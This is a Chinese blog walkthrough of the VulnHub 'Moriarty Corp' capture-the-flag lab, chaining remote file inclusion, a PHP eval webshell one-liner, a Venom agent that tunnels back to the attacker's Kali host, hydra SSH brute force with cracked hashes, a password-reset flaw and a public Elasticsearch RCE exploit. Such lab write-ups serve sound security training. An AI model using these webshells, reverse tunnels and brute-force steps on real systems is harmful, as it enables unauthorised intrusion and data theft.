BoredHackerBlog:Moriarty Corp【攻略】

已于 2023-11-03 14:46:51 修改
阅读量159 收藏
点赞数
分类专栏: VulnHub 靶机攻略 文章标签: linux web安全
于 2023-10-30 16:46:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51494407/article/details/134122901
版权

文章目录

介绍

  • Vulnhub地址:BoredHacker博客: Moriarty Corp ~ VulnHub

  • 发布日期: 29 Mar 2020

  • 难度:中等

  • 描述:

    你好代理。

    你来这里执行一项特殊任务。

    一项任务是摧毁最大的武器供应商之一,即莫里亚蒂公司。

    在网络应用程序中输入标志{开始}以开始使用!

    笔记:

    • Web 面板位于端口 8000 上(不在范围内。不要攻击)
    • 标志以 #_flag.txt 格式存储。标志以标志{}格式输入。它们通常存储在 / 目录中,但可以位于不同的位置。
    • 若要暂时停止播放,请暂停 VM。不要关闭它。
    • 添加标志时,Web 应用会在后台启动 docker 容器。关闭并重新启动会搞砸它。

  • 靶场环境:

机器ip
kali10.4.7.135
靶机10.4.7.141:8000

信息收集

主机发现

arp-scan -l

image-20231030163924339

端口扫描

namp -sV -O 10.4.7.141

image-20231030163958117

网站探测

根据 Vulnhub 描述访问8000端口。

输入 flag{start} 开始。

image-20231030164017797

根据提示,继续访问80端口。

image-20231030164031548

在网站的连接中发现文件包含漏洞。

文件包含漏洞,通常分为本地文件包含和远程文件包含。本地文件包含,通常需要能够写入 webshell 的文件进行包含,进而获取 shell 权限。远程文件包含,可对远程写入 webshell 的文件进行包含,获取 shell 权限。

image-20231030164107226

Web渗透

文件包含

在 kali 开启 Web 服务,靶机访问 php.php 文件进行包含,验证远程文件漏洞存在。

echo "<?php phpinfo(); ?>" > php.php
python3 -m http.server 80

image-20231024174409289

上传一句话木马。

<?php eval($_POST['ant']; ?>

image-20231024201328589

image-20231024201347532

使用中国蚁剑连接。

下载地址:AntSwordProject · GitHub

image-20231024201628897

image-20231024201715575

/ 目录下找到第一个 flag。
flag{the_game_is_on}

image-20231024201908843

回到8000端口提交 flag,提示给了内网网段172.17.0.3-254

image-20231024202045885

image-20231024212941487

内网渗透

添加代理

后续的主机都在内网中,使用 Venom 工具添加搭理。

kali 执行工具。

./admin_linux_x86 -lport 7777

使用蚁剑上传文件到靶机。

image-20231024212345593

image-20231024212419400

权限不够,进行赋权,执行文件。

chmod +x agent_linux_x64
./agent_linux_x64 -rhost 10.4.7.135 -rport 7777

image-20231024212635339

kali 获得回显,执行命令。

goto 1
socks 9999

image-20231024221546904

内网扫描

根据提示得知内网开启了80端口,直接扫描,发现172.17.0.4开启了80端口。

proxychains nmap -Pn -sT 172.17.0.0/24 -p 80

image-20231024222802866

访问页面,发现一个文件上传页面,需要输入上传密码。

image-20231030165216022

密码爆破

用 burpsuite 抓取上传数据包进行密码爆破。

在 burpsuite 内还需要设置 socks 代理,不然无法上传内网服务器。

image-20231026223851860

image-20231026224004863

密码爆破,使用top1000字典,此处为节省时间直接使用明文。

image-20231026224109662

添加文件并输入密码,上传 shell 文件成功后点击执行。

image-20231026224421295

使用蚁剑连接,需要配置蚁剑的代理。

image-20231026225445957

添加连接。

# URL地址
http://172.17.0.4/photo/23/shell.php

/目录下找到第二个flag。

flag{picture_is_worth_1000_words}

image-20231026225630638

提交 flag。

image-20231026225724567

image-20231026225753194

SSH爆破

提交 flag 后给出新的提示,内网中有一台开启 ssh 服务的主机,并提供了用户名和密码。
扫描内网中开启了22端口的主机,发现172.17.0.5开启了22端口。

proxychains nmap 172.17.0.3-10 -sT -Pn -T4 -p22

image-20231026230919909

将密码转换为明文,分别保存在两个 txt 文件中。

Usernames:
root
toor
admin
mcorp
moriarty

Password hashes (crack before brute forcing):
63a9f0ea7bb98050796b649e85481845:root
7b24afc8bc80e548d66c4e7ff72171c5:toor
5f4dcc3b5aa765d61d8327deb882cf99:password
21232f297a57a5a743894a0e4a801fc3:admin
084e0343a0486ff05530df6c705c8bb4:guest
697c6cc76fdbde5baccb7b3400391e30:MORIARTY
8839cfc8a0f24eb155ae3f7f205f5cbc:MCORP
35ac704fe1cc7807c914af478f20fd35:mcorp
b27a803ed346fbbf6d2e2eb88df1c51b:weapons
08552d48aa6d6d9c05dd67f1b4ba8747:moriarty

使用 hydra 进行密码爆破。

proxychains hydra -L user.txt -P password.txt ssh://172.17.0.5

image-20231027153527280

ssh连接。

proxychains ssh root@172.17.0.5

image-20231027165919243

找到第三个 flag,提交后给出新提示。

flag{what_weapons}

image-20231027165955682

image-20231027170549130

image-20231027170556626

任意密码修改

根据提示扫描443,8000,8080,8888端口。

proxychains nmap 172.17.0.3-30 -sT -Pn -T4 -p443,8000,8080,8888

image-20231027170620287

发现172.170.7:8000开启了端口。

image-20231027170640195

根据得到的账号和密码登录后台。

buyer13:arms13

image-20231027170749074

查看网站具有两个功能,可以查看 chats 聊天记录,可以更改用户名密码。

image-20231027170805312

查看记录后发现管理员账号名字为 admin

image-20231027172219742

到修改登录用户密码界面,尝试抓包,发现任意用户修改密码漏洞。

image-20231027172303527

image-20231027173942000

image-20231027173959012

成功修改admin 密码并登录。

image-20231027174018451

获得第四个 flag。

flag{on_the_move}

image-20231027174035795

远程执行代码

提交 flag 后给出新提示,文中提到一个 web 应用 Elasticsearch 是9200。

image-20231027180445750

百度后发现该服务使用9200端口。

image-20231027181025174

扫描端口,发现172.17.0.8:9200开启了端口。

proxychains nmap 172.17.0.3-30 -sT -Pn -T4 -p9200

image-20231027181137591

访问页面,发现服务的版本 lucene_version "4.10.2"

image-20231027182030620

使用 searchsploit 功能进行漏洞搜索。

searchsploit Elasticsearch

image-20231027183056699

下载第一个远程执行代码漏洞。

earchsploit -m linux/remote/36337.py

运行命令,获得权限。

proxychains python2 36337.py 172.17.0.7

image-20231027191825400

总结

本次包含:

  • 文件包含

  • 一句话木马

  • 蚁剑连接

  • 添加代理

  • 内网扫描

  • 密码爆破

  • ssh爆破

  • 任意密码修改

  • 远程代码执行

参考文章

靶场攻略 | Moriarty Corp渗透测试的博客-CSDN博客

【精选】vlunhub- BoredHackerBlog Moriarty Corp_GALi_233的博客-CSDN博客

vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)_vlunhub网站-CSDN博客

文件包含漏洞全面详解_caker丶的博客-CSDN博客

【精选】中国蚁剑(antSword)下载、安装、使用教程_攀爬的小白的博客-CSDN博客

php中eval()函数的使用_eval() php-CSDN博客

FoxyProxy Standard——Firefox代理组建安装详细过程-CSDN博客

ElasticSearch 端口介绍(9200、9300)_9200端口_旭东怪的博客-CSDN博客

wuuuenoi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[靶机渗透笔记] BOREDHACKERBLOG: MORIARTY CORP
H4ppyD0g的博客
01-23 2391
靶机链接https://www.vulnhub.com/entry/boredhackerblog-moriarty-copy%2C456/ 确定靶机 扫描存活主机 sudo nmap -sP 192.168.5.5/24 -sP 进行ping扫描 扫描具体信息 sudo nmap 192.168.5.5/24 确定靶机ip为192.168.5.6,根据vulhub这个靶机的信息提示,访问8000端口。 根据提示先输入flag{start},然后给出新的提示,攻击80端口。 文件包含 两个按钮,随便点
Whistleye_Project:该项目是Moriarty项目的延续。 但是这个osint网站比Moriarty具有更多的特色
05-18
Whistleye_Project 该项目是Moriarty项目的延续。 但是这个osint网站比Moriarty具有更多的特色。重要的服务器离线网站 如果您遇到错误,请从此存储库的“问题”部分告知我。您将从此处接收更新和更改。 暂无更新您...
vlunhub- BoredHackerBlog Moriarty Corp
GALi_233的博客
08-08 824
Description Hello Agent. You’re here on a special mission. A mission to take down one of the biggest weapons suppliers which is Moriarty Corp. Enter flag{start} into the webapp to get started! Notes: Web panel is on port 8000 (not in scope. Don’t attack)
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)
rang的博客
08-19 2249
文章目录靶场环境主机发现利用nmap 进行二层扫描利用arp-scan扫描探测文件包含利用远程文件包含 执行木马通过 LFISuite自动化工具 利用文件包含漏洞暴力破解文件上传SSH弱口令# payload反弹# 任意密码修改# 添加代理# 远程代码执行# 内网探测 #个人总结 靶场环境 攻击机:kali(192.168.1.100) 目标机:Moriarty Corp(192.168.1.105) 内网(172.17.0.0/24) 这里用vmware搭建靶场扫描不到目标,改用VM_VirtualBo
信息安全_红队技术漫谈@Moriarty.pptx
08-14
关于RedCore R&D的重要性 FSRT天赋技能树 RedCore之干货满满的RedTrain RedCore之不一样的RedOp RedCore之另类的红队学院 RedCore之“锋芒” BypassUAC的终极对决
【类库与框架】-moriarty.7z
07-07
【类库与框架】-moriarty.7z
AppLocker:AppLocker强化策略
04-29
AppLocker强化策略这是我为禁止某些已知的AppLocker绕过而创建的集合。 我使用以下过程构建规则: 添加了Oddvar Moe出色的编译列表( ) 添加了Microsoft建议的阻止规则( ) 添加...bohops,@ Moriarty_Meng和@pabraek
13 Linux实操篇-网络配置
qq_74289024的博客
04-23 1046
子网ip 与网关。
Linux多进程(五) 进程池 C++实现
Lyajpunov的博客
04-26 801
进程池是一种并发编程模式,用于管理和重用多个处理任务的进程。它通常用于需要频繁创建和销毁进程的情况,以避免因此产生的开销。减少进程创建销毁的开销:避免频繁创建和销毁进程所带来的系统资源开销。提高系统响应速度:由于进程已经初始化并且一直保持在内存中,可以立即分配执行任务,减少了任务等待时间。控制资源使用:通过限制进程池中的进程数量,可以控制系统资源的使用情况,避免资源过度消耗。
Linux——web服务配置
Xinan_____的博客
04-23 1133
GET:请求获取指定资源的表示形式。使用GET方法,客户端请求服务器发送某个资源。POST:向指定资源提交数据,用于处理表单提交、文件上传等操作。PUT:向指定资源位置上传其最新内容,用于更新资源。DELETE:请求服务器删除指定资源。HEAD:请求获取与实体相对应的头部信息,用于获取资源的元数据。OPTIONS:请求查询服务器支持的HTTP方法。TRACE:请求服务器回显收到的请求消息,用于测试或诊断。200 OK:请求成功。:永久重定向,请求的资源已经被分配了新的。
Linux:浏览器访问网站的基本流程(优先级从先到后)
fox_kang的博客
04-28 611
浏览器访问网站的基本流程(优先级从先到后) 首先查找浏览器是否存在该网站的访问缓存 其次查找本机的域名解析服务器 windows:C:\Windows\System32\drivers\etc\hosts Linux:/etc/hosts 使用外部的域名解析服务器解析(例如:114.114.114.114) 第一步:浏览器使用域名访问www.bilibili.com.网站 第二步:首先去访问根域名解析服务器查询,根服务器返回.com域名解析服务器地址==(这里的根域名解析服务器不会直接给出域名对应的
Linux 抽象命名空间(Abstract Namespace)简介
日拱一卒,玉汝于成
04-25 591
与传统的 UDS 不同,抽象命名空间并不在文件系统中创建实际文件,而是仅存在于内核内存中,其名称以 localabstract: 作为前缀。在这个例子中,我们创建了一个名为 my_abstract_namespace 的抽象命名空间,并将其绑定到了刚创建的 Unix 套接字上。要在 Linux 系统中生成一个抽象命名空间,通常需要使用编程语言的套接字 API 来创建一个 Unix 域套接字,并将其绑定到一个以 localabstract: 开头的特殊路径。
arm架构Linux5.0内核连接脚本文件vmlinux.lds.S分析
jianjian的博客
04-23 981
vmlinux.lds.S 是 Linux 内核中用于链接的脚本文件,用于定义内核对象文件的内存布局,即它告诉链接器如何将不同的内核代码段和数据段组合成一个最终的内核映像 vmlinux。编译内核源码生成内核文件的过程分两步,一个是“编译”,另一个是“链接”的过程,vmlinux.lds.S要做的就是告诉编译器如何链接编译好的各个内核.o文件,从而生成vmlinux文件。
linux的“>”和“>>”
qq_45212655的博客
04-24 466
文件存在,新的输出将被添加到文件的内容之后;如果文件不存在,将会创建一个新文件。文件存在,它的内容将被新的输出覆盖;如果文件不存在,将会创建一个新文件。都是用于文件重定向的操作符,它们用于将命令的输出发送到文件中。用于创建一个新文件或覆盖现有文件的内容。用于将输出附加到现有文件的末尾,而不是覆盖它。
Linux中的YUM源仓库和NFS文件共享服务
最新发布
2402_83805984的博客
04-29 443
yum是一个基于RPM包(是Red-Hat Package Manager红帽软件包管理器的缩写)构建的软件更新机制,能够自动解决软件包之间的依赖关系=,解决了日常工作中的大量查找安装依赖包的时间。NFS是一种基于TCP/IP传输的网络文件系统协议,最初由sun公司开发,通过NFS协议。客户机可以向访问本地目录一样访问远程NFS服务器中的共享资源。NFS也是NAS存储设备必然支持的一种协议,但是因为没有用户认证机制,而且数据在网络上明文传输、安全性很差,所以一般只能在局域网中使用。
Linux--内核移植(二)移植流程及驱动修改
qq_47258284的博客
04-23 1058
一、官方开发板内核测试本文来总结一下如何将 NXP官方提供的Linux内核移植到正点原子的开发板上。一、官方开发板内核测试NXP提供的Linux源码肯定是可以在自己的开发板上运行下去的,所以我们肯定是以 I.MX6ULL EVK开发板为参考,然后将Linux内核移植到开发板上的。1.修改顶层Makefile修改顶层Makefile,直接在顶层Makefile文件里面定义ARCH和这两个的变量值为 arm和 arm-linux-gnueabihf-。
Linux系统编程--信号与管道
qq_53344001的博客
04-28 1015
open 函数在打开管道文件的时候,必须两方都执行 open,open 才能打开,只有一个进程执行 open,open 会发生阻塞,直到另外的一个进程也运行到 open 的位置,两方同时解除阻塞。内核:当我们的程序出现一些错误的时候,例如段错误等,内核会给我们的进程发送杀死当前进程的信号。这就是通信机制:信号、管道。14 -- SIGALRM -- 闹钟信号,杀死进程。设置闹钟,闹钟事件到,产生闹钟信号,闹钟信号默认杀死当前进程;如果上一次设置的有闹钟,返回上一个闹钟的剩余时间,否则返回 0;
lstm和cnn结合代码pytorch
02-22
我可以为您提供一些示例代码,以使您的LSTM和CNN在Pytorch中结合使用:import torch import torch.nn as nnclass RNN_CNN(nn.Module): def __init__(self, embedding_dim, hidden_dim, vocab_size, tagset_size): super(RNN_CNN, self).__init__() self.hidden_dim = hidden_dim self.word_embeddings = nn.Embedding(vocab_size, embedding_dim) self.lstm = nn.LSTM(embedding_dim, hidden_dim) self.cnn = nn.Conv2d(1,1,(3,embedding_dim)) self.hidden2tag = nn.Linear(hidden_dim, tagset_size) def forward(self, sentence): embeds = self.word_embeddings(sentence) lstm_out, _ = self.lstm(embeds.view(len(sentence), 1, -1)) cnn_out = self.cnn(embeds.unsqueeze(1)) tag_space = self.hidden2tag(lstm_out.view(len(sentence), -1) + cnn_out.view(len(sentence), -1)) tag_scores = F.log_softmax(tag_space, dim=1) return tag_scores

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值